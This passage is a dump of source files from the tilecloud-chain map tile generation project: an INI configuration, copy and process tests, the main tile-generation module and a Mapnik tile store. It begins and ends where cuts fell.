print(f\"{nb_tile} tiles in zoom {z}.\")\n all_tiles += nb_tile\n if meta:\n time = times[z] + layer[\"cost\"][\"tile_generation_time\"] * nb_tile\n else:\n time = layer[\"cost\"][\"tileonly_generation_time\"] * nb_tile\n size = layer[\"cost\"][\"tile_size\"] * nb_tile\n all_size += size\n\n all_time += time\n td = timedelta(milliseconds=time)\n print(f\"Time to generate: {duration_format(td)} [d h:mm:ss]\")\n c = gene.get_main_config().config[\"cost\"][\"s3\"][\"put\"] * nb_tile / 1000.0\n price += c\n print(f\"S3 PUT: {c:0.2f} [$]\")\n\n if \"sqs\" in gene.get_main_config().config:\n if meta:\n nb_sqs = nb_metatiles[z] * 3\n else:\n nb_sqs = nb_tile * 3\n c = nb_sqs * gene.get_main_config().config[\"cost\"][\"sqs\"][\"request\"] / 1000000.0\n price += c\n print(f\"SQS usage: {c:0.2f} [$]\")\n\n print()\n td = timedelta(milliseconds=all_time)\n print(f\"Number of tiles: {all_tiles}\")\n print(f\"Generation time: {duration_format(td)} [d h:mm:ss]\")\n print(f\"Generation cost: {price:0.2f} [$]\")\n\n return all_size, td, price, all_tiles\n" }, { "alpha_fraction": 0.7332921028137207, "alphanum_fraction": 0.7456682920455933, "avg_line_length": 19.71794891357422, "blob_id": "d36ba0768f786d9ec76e5be460715042d0975f1b", "content_id": "23a58343a3ef25899d6a7c5a1630155e78a904b4", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 1616, "license_type": "permissive", "max_line_length": 84, "num_lines": 78, "path": "/development.ini", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "###\n# app configuration\n# http://docs.pylonsproject.org/projects/pyramid/en/1.6-branch/narr/environment.html\n###\n\n[app:app]\nuse = egg:tilecloud-chain\nfilter-with = proxy-prefix\n\npyramid.reload_templates = %(DEVELOPMENT)s\npyramid.debug_authorization = %(DEVELOPMENT)s\npyramid.debug_notfound = %(DEVELOPMENT)s\npyramid.debug_routematch = %(DEVELOPMENT)s\npyramid.debug_templates = %(DEVELOPMENT)s\npyramid.default_locale_name = en\n\nc2c.base_path = /c2c\n\ntilegeneration_configfile = %(TILEGENERATION_CONFIGFILE)s\n\n[pipeline:main]\npipeline = egg:c2cwsgiutils#client_info egg:c2cwsgiutils#sentry app\n\n[filter:proxy-prefix]\nuse = egg:PasteDeploy#prefix\nprefix = %(VISIBLE_ENTRY_POINT)s\n\n[server:main]\nuse = egg:waitress#main\nlisten = *:8080\n\n###\n# logging configuration\n# http://docs.pylonsproject.org/projects/pyramid/en/1.6-branch/narr/logging.html\n###\n\n[loggers]\nkeys = root, c2cwsgi, tilecloud, tilecloud_chain\n\n[handlers]\nkeys = console, json\n\n[formatters]\nkeys = generic\nformat = %(levelname)-5.5s [%(name)s] %(message)s\n\n[logger_root]\nlevel = %(OTHER_LOG_LEVEL)s\nhandlers = %(LOG_TYPE)s\n\n[logger_tilecloud]\nlevel = %(TILECLOUD_LOG_LEVEL)s\nhandlers =\nqualname = tilecloud\n\n[logger_tilecloud_chain]\nlevel = %(TILECLOUD_CHAIN_LOG_LEVEL)s\nhandlers =\nqualname = tilecloud_chain\n\n[logger_c2cwsgi]\nlevel = %(C2CWSGIUTILS_LOG_LEVEL)s\nhandlers =\nqualname = c2cwsgiutils\n\n[handler_console]\nclass = StreamHandler\nargs = (sys.stdout,)\nlevel = NOTSET\nformatter = generic\n\n[formatter_generic]\nformat = %(levelname)-5.5s %(name)s %(message)s\n\n[handler_json]\nclass = tilecloud_chain.JsonLogHandler\nargs = (sys.stdout,)\nlevel = NOTSET\n" }, { "alpha_fraction": 0.500330924987793, "alphanum_fraction": 0.5539377927780151, "avg_line_length": 32.57777786254883, "blob_id": "bce676807335487dc58aa251366978255fee945a", "content_id": "dd8ea63d3eaae20907947a7e95933c18721356a9", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3022, "license_type": "permissive", "max_line_length": 98, "num_lines": 90, "path": "/tilecloud_chain/tests/test_copy.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\nimport shutil\n\nimport requests\n\nfrom tilecloud_chain import copy_\nfrom tilecloud_chain.tests import CompareCase\n\n\nclass TestGenerate(CompareCase):\n def setUp(self) -> None: # noqa\n self.maxDiff = None\n\n @classmethod\n def setUpClass(cls): # noqa\n os.chdir(os.path.dirname(__file__))\n if os.path.exists(\"/tmp/tiles\"):\n shutil.rmtree(\"/tmp/tiles\")\n os.makedirs(\"/tmp/tiles/src/1.0.0/point_hash/default/21781/0/0/\")\n\n @classmethod\n def tearDownClass(cls): # noqa\n os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))\n if os.path.exists(\"/tmp/tiles\"):\n shutil.rmtree(\"/tmp/tiles\")\n\n def test_copy(self) -> None:\n with open(\"/tmp/tiles/src/1.0.0/point_hash/default/21781/0/0/0.png\", \"w\") as f:\n f.write(\"test image\")\n\n for d in (\"-d\", \"-q\", \"-v\"):\n self.assert_cmd_equals(\n cmd=f\".build/venv/bin/generate_copy {d} -c tilegeneration/test-copy.yaml src dst\",\n main_func=copy_.main,\n regex=True,\n expected=\"\"\"The tile copy of layer 'point_hash' is finish\nNb copy tiles: 1\nNb errored tiles: 0\nNb dropped tiles: 0\nTotal time: 0:00:[0-9][0-9]\nTotal size: 10 o\nTime per tile: [0-9]+ ms\nSize per tile: 10(.0)? o\n\n\"\"\"\n if d != \"-q\"\n else \"\",\n empty_err=True,\n )\n with open(\"/tmp/tiles/dst/1.0.0/point_hash/default/21781/0/0/0.png\") as f:\n self.assertEqual(f.read(), \"test image\")\n\n def test_process(self) -> None:\n for d in (\"-vd\", \"-q\", \"-v\", \"\"):\n response = requests.get(\n \"http://mapserver:8080/mapserv?STYLES=default&SERVICE=WMS&FORMAT=\\\nimage%2Fpng&REQUEST=GetMap&HEIGHT=256&WIDTH=256&VERSION=1.1.1&BBOX=\\\n%28560800.0%2C+158000.0%2C+573600.0%2C+170800.0%29&LAYERS=point&SRS=EPSG%3A21781\"\n )\n response.raise_for_status()\n with open(\"/tmp/tiles/src/1.0.0/point_hash/default/21781/0/0/0.png\", \"wb\") as out:\n out.write(response.content)\n statinfo = os.stat(\n \"/tmp/tiles/src/1.0.0/point_hash/default/21781/0/0/0.png\",\n )\n self.assertEqual(statinfo.st_size, 755)\n\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_process {} -c \"\n \"tilegeneration/test-copy.yaml --cache src optipng\".format(d),\n main_func=copy_.process,\n regex=True,\n expected=\"\"\"The tile process of layer 'point_hash' is finish\nNb process tiles: 1\nNb errored tiles: 0\nNb dropped tiles: 0\nTotal time: 0:00:[0-9][0-9]\nTotal size: 103 o\nTime per tile: [0-9]+ ms\nSize per tile: 103(.0)? o\n\n\"\"\"\n if d != \"-q\"\n else \"\",\n empty_err=True,\n )\n statinfo = os.stat(\n \"/tmp/tiles/src/1.0.0/point_hash/default/21781/0/0/0.png\",\n )\n self.assertEqual(statinfo.st_size, 103)\n" }, { "alpha_fraction": 0.5345144867897034, "alphanum_fraction": 0.5380809903144836, "avg_line_length": 39.743751525878906, "blob_id": "af11f1aabc0ebb401e7cc71d3f85a559243b25c9", "content_id": "046d891946a23e9aafd0de7b65052231ce555f3b", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 26076, "license_type": "permissive", "max_line_length": 125, "num_lines": 640, "path": "/tilecloud_chain/generate.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nimport os\nimport random\nimport socket\nimport sys\nimport threading\nfrom argparse import ArgumentParser, Namespace\nfrom datetime import datetime\nfrom getpass import getuser\nfrom typing import IO, Callable, List, Optional, cast\n\nimport boto3\nimport prometheus_client\n\nimport tilecloud.filter.error\nimport tilecloud_chain\nfrom tilecloud import Tile, TileCoord, TileStore\nfrom tilecloud.filter.logger import Logger\nfrom tilecloud.layout.wms import WMSTileLayout\nfrom tilecloud.store.url import URLTileStore\nfrom tilecloud_chain import (\n Count,\n CountSize,\n HashDropper,\n HashLogger,\n LocalProcessFilter,\n MultiAction,\n TileGeneration,\n TilesFileStore,\n add_common_options,\n get_queue_store,\n parse_tilecoord,\n quote,\n)\nfrom tilecloud_chain.database_logger import DatabaseLogger, DatabaseLoggerInit\nfrom tilecloud_chain.format import default_int, duration_format, size_format\nfrom tilecloud_chain.multitilestore import MultiTileStore\nfrom tilecloud_chain.timedtilestore import TimedTileStoreWrapper\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass LogTilesContext:\n \"\"\"Logging tile context.\"\"\"\n\n def __init__(self, gene: TileGeneration):\n self.gene = gene\n\n def __call__(self, tile: Tile) -> Tile:\n tilecloud_chain.LOGGING_CONTEXT.setdefault(os.getpid(), {})[threading.current_thread().native_id] = { # type: ignore\n \"host\": tile.metadata.get(\"host\"),\n \"layer\": tile.metadata.get(\"layer\"),\n \"meta_tilecoord\": str(tile.tilecoord),\n }\n\n return tile\n\n\nclass Generate:\n \"\"\"Generate the tiles, generate the queue, ...\"\"\"\n\n def __init__(\n self, options: Namespace, gene: TileGeneration, out: Optional[IO[str]], server: bool = False\n ) -> None:\n self._count_metatiles: Optional[Count] = None\n self._count_metatiles_dropped: Optional[Count] = None\n self._count_tiles: Optional[Count] = None\n self._count_tiles_dropped: Optional[Count] = None\n self._count_tiles_stored: Optional[CountSize] = None\n self._queue_tilestore: Optional[TileStore] = None\n self._cache_tilestore: Optional[TileStore] = None\n self._options = options\n self._gene = gene\n self.out = out\n\n if getattr(self._options, \"get_hash\", None) is not None:\n self._options.role = \"hash\"\n self._options.test = 1\n\n if getattr(self._options, \"tiles\", None) is not None:\n self._options.role = \"slave\"\n\n self._generate_init()\n if self._options.role != \"master\" and not server:\n self._generate_tiles()\n\n def gene(self, layer_name: Optional[str] = None) -> None:\n if self._count_tiles is not None:\n self._count_tiles.nb = 0\n if self._count_tiles_dropped is not None:\n self._count_tiles_dropped.nb = 0\n if self._count_tiles_stored is not None:\n self._count_tiles_stored.nb = 0\n self._count_tiles_stored.size = 0\n if self._count_metatiles is not None:\n self._count_metatiles.nb = 0\n if self._count_metatiles_dropped is not None:\n self._count_metatiles_dropped.nb = 0\n self._gene.error = 0\n\n if self._options.role != \"slave\" and not self._options.get_hash and not self._options.get_bbox:\n assert layer_name\n self._gene.create_log_tiles_error(layer_name)\n\n if self._options.role != \"slave\" or self._options.tiles:\n self._generate_queue(layer_name)\n\n self.generate_consume()\n self.generate_resume(layer_name)\n\n def _generate_init(self) -> None:\n if self._options.role != \"server\":\n self._count_metatiles_dropped = Count()\n self._count_tiles = Count()\n self._count_tiles_dropped = Count()\n\n if self._options.role in (\"master\", \"slave\") and not self._options.tiles:\n self._queue_tilestore = get_queue_store(self._gene.get_main_config(), self._options.daemon)\n\n if self._options.role in (\"local\", \"master\"):\n self._gene.add_geom_filter()\n\n if self._options.role in (\"local\", \"master\") and \"logging\" in self._gene.get_main_config().config:\n self._gene.imap(\n DatabaseLoggerInit(\n self._gene.get_main_config().config[\"logging\"],\n self._options is not None and self._options.daemon,\n )\n )\n\n if self._options.local_process_number is not None:\n self.add_local_process_filter()\n\n # At this stage, the tilestream contains metatiles that intersect geometry\n self._gene.add_logger()\n\n if self._options.role == \"master\":\n assert self._queue_tilestore is not None\n # Put the metatiles into the SQS or Redis queue\n self._gene.put(self._queue_tilestore)\n self._count_tiles = self._gene.counter()\n\n if self._options.role in (\"local\", \"slave\"):\n self._cache_tilestore = self._gene.get_tilesstore()\n assert self._cache_tilestore is not None\n\n def add_local_process_filter(self) -> None:\n self._gene.imap(\n LocalProcessFilter(\n self._gene.get_main_config().config[\"generation\"][\"number_process\"],\n self._options.local_process_number,\n )\n )\n\n def _generate_queue(self, layer_name: Optional[str]) -> None:\n if self._options.tiles:\n self._gene.set_store(TilesFileStore(self._options.tiles))\n return\n\n assert layer_name is not None\n assert self._gene.config_file is not None\n config = self._gene.get_config(self._gene.config_file)\n layer = config.config[\"layers\"][layer_name]\n\n if self._options.get_bbox:\n try:\n tilecoord = parse_tilecoord(self._options.get_bbox)\n bounds = default_int(self._gene.get_grid(config, layer[\"grid\"]).extent(tilecoord))\n print(f\"Tile bounds: [{','.join([str(b) for b in bounds])}]\", file=self.out)\n sys.exit()\n except ValueError:\n _LOGGER.exception(\n \"Tile '%s' is not in the format 'z/x/y' or z/x/y:+n/+n\",\n self._options.get_bbox,\n )\n sys.exit(1)\n\n if self._options.role in (\"local\", \"master\"):\n # Generate a stream of metatiles\n self._gene.init_tilecoords(config, layer_name)\n\n elif self._options.role == \"hash\":\n layer = config.config[\"layers\"][layer_name]\n try:\n z, x, y = (int(v) for v in self._options.get_hash.split(\"/\"))\n if layer.get(\"meta\"):\n self._gene.set_tilecoords(config, [TileCoord(z, x, y, layer[\"meta_size\"])], layer_name)\n else:\n self._gene.set_tilecoords(config, [TileCoord(z, x, y)], layer_name)\n except ValueError:\n _LOGGER.exception(\"Tile '%s' is not in the format 'z/x/y'\", self._options.get_hash)\n sys.exit(1)\n\n def _generate_tiles(self) -> None:\n if self._options.role in (\"slave\") and not self._options.tiles:\n assert self._queue_tilestore is not None\n # Get the metatiles from the SQS/Redis queue\n self._gene.set_store(self._queue_tilestore)\n self._gene.imap(lambda tile: tile if \"layer\" in tile.metadata else None)\n self._gene.imap(LogTilesContext(self._gene))\n\n if self._options.role != \"server\":\n self._count_metatiles = self._gene.counter()\n\n self._gene.get(\n TimedTileStoreWrapper(\n MultiTileStore(TilestoreGetter(self)),\n store_name=\"get\",\n ),\n \"Get tile\",\n )\n\n if self._options.role in (\"local\", \"slave\") and \"logging\" in self._gene.get_main_config().config:\n self._gene.imap(\n DatabaseLogger(\n self._gene.get_main_config().config[\"logging\"],\n self._options is not None and self._options.daemon,\n )\n )\n self._gene.init(\n self._queue_tilestore\n if \"error_file\" in self._gene.get_main_config().config[\"generation\"]\n else None,\n self._options.daemon,\n )\n else:\n self._gene.init(daemon=self._options.daemon)\n\n if self._options.role == \"hash\":\n self._gene.imap(HashLogger(\"empty_metatile_detection\", self.out))\n elif not self._options.near:\n assert self._count_metatiles_dropped is not None\n self._gene.imap(MultiAction(HashDropperGetter(self, True, self._count_metatiles_dropped)))\n\n def add_elapsed_togenerate(metatile: Tile) -> Optional[Tile]:\n if metatile is not None:\n metatile.elapsed_togenerate = metatile.tilecoord.n**2 # type: ignore\n return metatile\n return None\n\n self._gene.imap(add_elapsed_togenerate)\n\n # Split the metatile image into individual tiles\n self._gene.add_metatile_splitter()\n self._gene.imap(Logger(_LOGGER, logging.INFO, \"%(tilecoord)s, %(formated_metadata)s\"))\n\n if self._count_tiles is not None:\n self._gene.imap(self._count_tiles)\n\n self._gene.process(key=\"pre_hash_post_process\")\n\n if self._options.role == \"hash\":\n self._gene.imap(HashLogger(\"empty_tile_detection\", self.out))\n elif not self._options.near:\n assert self._count_tiles_dropped is not None\n self._gene.imap(MultiAction(HashDropperGetter(self, False, self._count_tiles_dropped)))\n\n if self._options.role != \"server\":\n self._gene.process()\n\n if self._options.role in (\"local\", \"slave\"):\n self._count_tiles_stored = self._gene.counter_size()\n\n if self._options.time:\n\n def log_size(tile: Tile) -> Tile:\n assert tile.data is not None\n sys.stdout.write(f\"size: {len(tile.data)}\\n\")\n return tile\n\n self._gene.imap(log_size)\n\n assert self._cache_tilestore is not None\n self._gene.put(self._cache_tilestore, \"Store the tile\")\n\n if self._options.role == \"slave\" and not self._options.tiles:\n\n def delete_from_store(tile: Tile) -> Tile:\n assert self._queue_tilestore is not None\n if hasattr(tile, \"metatile\"):\n metatile: Tile = tile.metatile\n metatile.elapsed_togenerate -= 1 # type: ignore\n if metatile.elapsed_togenerate == 0: # type: ignore\n self._queue_tilestore.delete_one(metatile)\n else:\n self._queue_tilestore.delete_one(tile)\n return tile\n\n self._gene.imap(delete_from_store)\n\n if self._options.role in (\"local\", \"slave\") and \"logging\" in self._gene.get_main_config().config:\n self._gene.imap(\n DatabaseLogger(\n self._gene.get_main_config().config[\"logging\"],\n self._options is not None and self._options.daemon,\n )\n )\n self._gene.init(daemon=self._options.daemon)\n\n def generate_consume(self) -> None:\n if self._options.time is not None:\n options = self._options\n\n class LogTime:\n \"\"\"Log the generation time.\"\"\"\n\n n = 0\n t1 = None\n\n def __call__(self, tile: Tile) -> Tile:\n self.n += 1\n assert options.time\n if self.n == options.time:\n self.t1 = datetime.now()\n elif self.n == 2 * options.time:\n t2 = datetime.now()\n assert self.t1\n duration = (t2 - self.t1) / options.time\n time = (\n duration.days * 24 * 3600 + duration.seconds\n ) * 1000000 + duration.microseconds\n sys.stdout.write(f\"time: {time}\\n\")\n return tile\n\n self._gene.imap(LogTime())\n\n self._gene.consume(self._options.time * 3)\n else:\n self._gene.consume()\n\n def generate_resume(self, layer_name: Optional[str]) -> None:\n config = self._gene.get_config(self._gene.config_file) if self._gene.config_file is not None else None\n if self._options.time is None:\n layer = None\n if layer_name is not None:\n assert config is not None\n layer = config.config[\"layers\"][layer_name]\n all_dimensions = self._gene.get_all_dimensions(layer)\n formated_dimensions = \" - \".join(\n [\", \".join([\"=\".join(d) for d in dimensions.items()]) for dimensions in all_dimensions]\n )\n suffix = (\n \"\"\n if ((len(all_dimensions) == 1 and len(all_dimensions[0]) == 0) or layer[\"type\"] != \"wms\")\n else f\" ({formated_dimensions})\"\n )\n message = [f\"The tile generation of layer '{layer_name}{suffix}' is finish\"]\n else:\n message = [\"The tile generation is finish\"]\n if self._options.role == \"master\":\n assert self._count_tiles\n message.append(f\"Nb of generated jobs: {self._count_tiles.nb}\")\n elif layer.get(\"meta\") if layer is not None else self._options.role == \"slave\":\n assert self._count_metatiles is not None\n assert self._count_metatiles_dropped is not None\n message += [\n f\"Nb generated metatiles: {self._count_metatiles.nb}\",\n f\"Nb metatiles dropped: {self._count_metatiles_dropped.nb}\",\n ]\n\n if self._options.role != \"master\":\n assert self._count_tiles is not None\n assert self._count_tiles_dropped is not None\n message += [\n f\"Nb generated tiles: {self._count_tiles.nb}\",\n f\"Nb tiles dropped: {self._count_tiles_dropped.nb}\",\n ]\n if self._options.role in (\"local\", \"slave\"):\n assert self._count_tiles_stored is not None\n assert self._count_tiles is not None\n message += [\n f\"Nb tiles stored: {self._count_tiles_stored.nb}\",\n f\"Nb tiles in error: {self._gene.error}\",\n f\"Total time: {duration_format(self._gene.duration)}\",\n ]\n if self._count_tiles_stored.nb != 0:\n message.append(f\"Total size: {size_format(self._count_tiles_stored.size)}\")\n if self._count_tiles.nb != 0:\n message.append(\n \"Time per tile: \"\n f\"{(self._gene.duration / self._count_tiles.nb * 1000).seconds:0.0f} ms\"\n )\n if self._count_tiles_stored.nb != 0:\n message.append(\n \"Size per tile: \"\n f\"{self._count_tiles_stored.size / self._count_tiles_stored.nb:0.0f} o\"\n )\n\n if not self._options.quiet and self._options.role in (\"local\", \"slave\", \"master\") and message:\n print(\"\\n\".join(message) + \"\\n\", file=self.out)\n\n if self._cache_tilestore is not None and hasattr(self._cache_tilestore, \"connection\"):\n self._cache_tilestore.connection.close()\n\n if (\n self._options.role != \"hash\"\n and self._options.time is None\n and config is not None\n and \"sns\" in config.config\n ):\n if \"region\" in config.config[\"sns\"]:\n sns_client = boto3.client(\"sns\", region_name=config.config[\"sns\"].get(\"region\", \"eu-west-1\"))\n else:\n sns_client = boto3.client(\"sns\")\n sns_message = [message[0]]\n sns_message += [\n f\"Layer: {layer_name if layer_name is not None else '(All layers)'}\",\n f\"Role: {self._options.role}\",\n f\"Host: {socket.getfqdn()}\",\n f\"Command: {' '.join([quote(arg) for arg in sys.argv])}\",\n ]\n sns_message += message[1:]\n sns_client.publish(\n TopicArn=config.config[\"sns\"][\"topic\"],\n Message=\"\\n\".join(sns_message),\n Subject=f\"Tile generation ({layer_name if layer_name is not None else 'All layers'} - \"\n f\"{self._options.role})\",\n )\n\n\nclass TilestoreGetter:\n \"\"\"Used to get the correct tilestore based on the layername config file any layer type.\"\"\"\n\n def __init__(self, gene: Generate):\n self.gene = gene\n\n def __call__(self, config_file: str, layer_name: str) -> Optional[TileStore]:\n config = self.gene._gene.get_config(config_file)\n layer = config.config[\"layers\"][layer_name]\n if layer[\"type\"] == \"wms\":\n params = layer.get(\"params\", {}).copy()\n if \"STYLES\" not in params:\n params[\"STYLES\"] = \",\".join(layer[\"wmts_style\"] for _ in layer[\"layers\"].split(\",\"))\n if layer.get(\"generate_salt\", False):\n params[\"SALT\"] = str(random.randint(0, 999999)) # nosec\n\n # Get the metatile image from the WMS server\n return TimedTileStoreWrapper(\n URLTileStore(\n tilelayouts=(\n WMSTileLayout(\n url=layer[\"url\"],\n layers=layer[\"layers\"],\n srs=config.config[\"grids\"][layer[\"grid\"]][\"srs\"],\n format=layer[\"mime_type\"],\n border=layer[\"meta_buffer\"] if layer[\"meta\"] else 0,\n tilegrid=self.gene._gene.get_grid(config, layer[\"grid\"]),\n params=params,\n ),\n ),\n headers=layer[\"headers\"],\n ),\n \"wms\",\n )\n elif layer[\"type\"] == \"mapnik\":\n try:\n from tilecloud.store.mapnik_ import MapnikTileStore # pylint: disable=import-outside-toplevel\n from tilecloud_chain.mapnik_ import ( # pylint: disable=import-outside-toplevel\n MapnikDropActionTileStore,\n )\n except ImportError:\n if os.environ.get(\"CI\", \"FALSE\") == \"FALSE\": # pragma nocover\n _LOGGER.error(\"Mapnik is not available\", exc_info=True)\n return None\n\n grid = config.config[\"grids\"][layer[\"grid\"]]\n if cast(str, layer.get(\"output_format\", \"png\")) == \"grid\":\n assert self.gene._count_tiles\n assert self.gene._count_tiles_dropped\n return MapnikDropActionTileStore(\n tilegrid=self.gene._gene.get_grid(config, layer[\"grid\"]),\n mapfile=layer[\"mapfile\"],\n image_buffer=layer[\"meta_buffer\"] if layer.get(\"meta\") else 0,\n data_buffer=layer.get(\"data_buffer\", 128),\n output_format=layer.get(\"output_format\", \"png\"),\n resolution=layer.get(\"resolution\", 4),\n layers_fields=layer.get(\"layers_fields\", {}),\n drop_empty_utfgrid=layer.get(\"drop_empty_utfgrid\", False),\n store=self.gene._cache_tilestore,\n queue_store=self.gene._queue_tilestore,\n count=[self.gene._count_tiles, self.gene._count_tiles_dropped],\n proj4_literal=grid[\"proj4_literal\"],\n )\n else:\n return MapnikTileStore(\n tilegrid=self.gene._gene.get_grid(config, layer[\"grid\"]),\n mapfile=layer[\"mapfile\"],\n image_buffer=layer[\"meta_buffer\"] if layer.get(\"meta\") else 0,\n data_buffer=layer.get(\"data_buffer\", 128),\n output_format=cast(str, layer.get(\"output_format\", \"png\")),\n proj4_literal=grid[\"proj4_literal\"],\n )\n return None\n\n\ndef detach() -> None:\n \"\"\"Detach to the parent process.\"\"\"\n try:\n pid = os.fork()\n if pid > 0:\n print(f\"Detached with pid {pid}.\")\n sys.stderr.write(str(pid))\n # exit parent\n sys.exit(0)\n except OSError as e:\n _LOGGER.exception(\"fork #1 failed: %d (%s)\", e.errno, e.strerror)\n sys.exit(1)\n\n\ndef main(args: Optional[List[str]] = None, out: Optional[IO[str]] = None) -> None:\n \"\"\"Run the tiles generation.\"\"\"\n try:\n parser = ArgumentParser(\n description=\"Used to generate the tiles\", prog=args[0] if args else sys.argv[0]\n )\n add_common_options(parser, dimensions=True)\n parser.add_argument(\n \"--get-hash\", metavar=\"TILE\", help=\"get the empty tiles hash, use the specified TILE z/x/y\"\n )\n parser.add_argument(\n \"--get-bbox\",\n metavar=\"TILE\",\n help=\"get the bbox of a tile, use the specified TILE z/x/y, or z/x/y:+n/+n for metatiles\",\n )\n parser.add_argument(\n \"--role\",\n default=\"local\",\n choices=(\"local\", \"master\", \"slave\"),\n help=\"local/master/slave, master to file the queue and slave to generate the tiles\",\n )\n parser.add_argument(\n \"--local-process-number\", default=None, help=\"The number of process that we run in parallel\"\n )\n parser.add_argument(\n \"--detach\", default=False, action=\"store_true\", help=\"run detached from the terminal\"\n )\n parser.add_argument(\n \"--daemon\", default=False, action=\"store_true\", help=\"run continuously as a daemon\"\n )\n parser.add_argument(\n \"--tiles\",\n metavar=\"FILE\",\n help=\"Generate the tiles from a tiles file, use the format z/x/y, or z/x/y:+n/+n for metatiles\",\n )\n\n options = parser.parse_args(args[1:] if args else sys.argv[1:])\n\n if options.detach:\n detach()\n\n if options.daemon and \"C2C_PROMETHEUS_PORT\" in os.environ:\n prometheus_client.start_http_server(int(os.environ[\"C2C_PROMETHEUS_PORT\"]))\n\n gene = TileGeneration(\n config_file=options.config or os.environ.get(\"TILEGENERATION_CONFIGFILE\"),\n options=options,\n multi_thread=options.get_hash is None,\n )\n\n if (\n options.get_hash is None\n and options.get_bbox is None\n and options.config is not None\n and \"authorised_user\" in gene.get_main_config().config.get(\"generation\", {})\n and gene.get_main_config().config[\"generation\"][\"authorised_user\"] != getuser()\n ):\n _LOGGER.error(\n \"not authorized, authorized user is: %s.\",\n gene.get_main_config().config[\"generation\"][\"authorised_user\"],\n )\n sys.exit(1)\n\n if options.config:\n config = gene.get_config(options.config)\n\n if options.cache is None and options.config:\n options.cache = config.config[\"generation\"][\"default_cache\"]\n\n if options.tiles is not None and options.role not in [\"local\", \"master\"]:\n _LOGGER.error(\"The --tiles option work only with role local or master\")\n sys.exit(1)\n\n try:\n generate = Generate(options, gene, out)\n if options.role == \"slave\":\n generate.gene()\n elif options.layer:\n generate.gene(options.layer)\n elif options.get_bbox:\n _LOGGER.error(\"With --get-bbox option you need to specify a layer\")\n sys.exit(1)\n elif options.get_hash:\n _LOGGER.error(\"With --get-hash option you need to specify a layer\")\n sys.exit(1)\n else:\n if options.config:\n for layer in config.config[\"generation\"].get(\n \"default_layers\", config.config[\"layers\"].keys()\n ):\n generate.gene(layer)\n except tilecloud.filter.error.TooManyErrors:\n _LOGGER.exception(\"Too many errors\")\n sys.exit(1)\n finally:\n gene.close()\n except SystemExit:\n raise\n except: # pylint: disable=bare-except\n _LOGGER.exception(\"Exit with exception\")\n if os.environ.get(\"TESTS\", \"false\").lower() == \"true\":\n raise\n sys.exit(1)\n\n\nclass HashDropperGetter:\n \"\"\"Drop th tiles based on the hash and the size.\"\"\"\n\n def __init__(self, gene: Generate, meta: bool, count: Count):\n self.gene = gene\n self.meta = meta\n self.count = count\n\n def __call__(self, config_file: str, layer_name: str) -> Callable[[Tile], Optional[Tile]]:\n \"\"\"Call.\"\"\"\n layer = self.gene._gene.get_config(config_file).config[\"layers\"][layer_name]\n conf_name = \"empty_metatile_detection\" if self.meta else \"empty_tile_detection\"\n if conf_name in layer:\n empty_tile = layer[\"empty_metatile_detection\"] if self.meta else layer[\"empty_tile_detection\"]\n return HashDropper(\n empty_tile[\"size\"],\n empty_tile[\"hash\"],\n store=self.gene._gene.get_tilesstore(),\n queue_store=self.gene._gene.queue_store,\n count=self.count,\n )\n return lambda tile: tile\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5803877115249634, "alphanum_fraction": 0.5820980668067932, "avg_line_length": 36.319149017333984, "blob_id": "b96e132eb2399b6d531e5e55c1db11747dfcbe83", "content_id": "b04bc43d697a71e3349c1c871f217fd8caf0e0a9", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1754, "license_type": "permissive", "max_line_length": 101, "num_lines": 47, "path": "/tilecloud_chain/mapnik_.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nfrom typing import Any, Callable, List, Optional\n\nfrom tilecloud import Tile, TileStore\nfrom tilecloud.store.mapnik_ import MapnikTileStore\n\nlogger = logging.getLogger(__name__)\n\n\nclass MapnikDropActionTileStore(MapnikTileStore):\n \"\"\"MapnikTileStore with drop action if the generated tile is empty.\"\"\"\n\n def __init__(\n self,\n store: Optional[TileStore] = None,\n queue_store: Optional[TileStore] = None,\n count: Optional[List[Callable[[Optional[Tile]], Any]]] = None,\n **kwargs: Any,\n ) -> None:\n \"\"\"Initialize.\"\"\"\n self.store = store\n self.queue_store = queue_store\n self.count = count or []\n MapnikTileStore.__init__(self, **kwargs)\n\n def get_one(self, tile: Tile) -> Optional[Tile]:\n \"\"\"See in superclass.\"\"\"\n result = MapnikTileStore.get_one(self, tile)\n if result is None:\n if self.store is not None:\n if tile.tilecoord.n != 1:\n for tilecoord in tile.tilecoord:\n self.store.delete_one(Tile(tilecoord))\n else:\n self.store.delete_one(tile)\n logger.info(\"The tile %s %s is dropped\", tile.tilecoord, tile.formated_metadata)\n if hasattr(tile, \"metatile\"):\n metatile: Tile = tile.metatile\n metatile.elapsed_togenerate -= 1 # type: ignore\n if metatile.elapsed_togenerate == 0 and self.queue_store is not None: # type: ignore\n self.queue_store.delete_one(metatile)\n elif self.queue_store is not None:\n self.queue_store.delete_one(tile)\n\n for count in self.count:\n count(None)\n return result\n" }, { "alpha_fraction": 0.6575217247009277, "alphanum_fraction": 0.6819844245910645, "avg_line_length": 77.8108139038086, "blob_id": "50acae26e68a941310893f333724a82ec456e195", "content_id": "b8dcf5a827a4f430b0aa7b78413802b90570ceb1", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17496, "license_type": "permissive", "max_line_length": 344, "num_lines": 222, "path": "/tilecloud_chain/tests/test_error.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\n\nfrom testfixtures import LogCapture\n\nfrom tilecloud_chain import controller, generate\nfrom tilecloud_chain.tests import CompareCase\n\n\nclass TestError(CompareCase):\n def setUp(self) -> None: # noqa\n self.maxDiff = None\n\n @classmethod\n def setUpClass(cls): # noqa\n 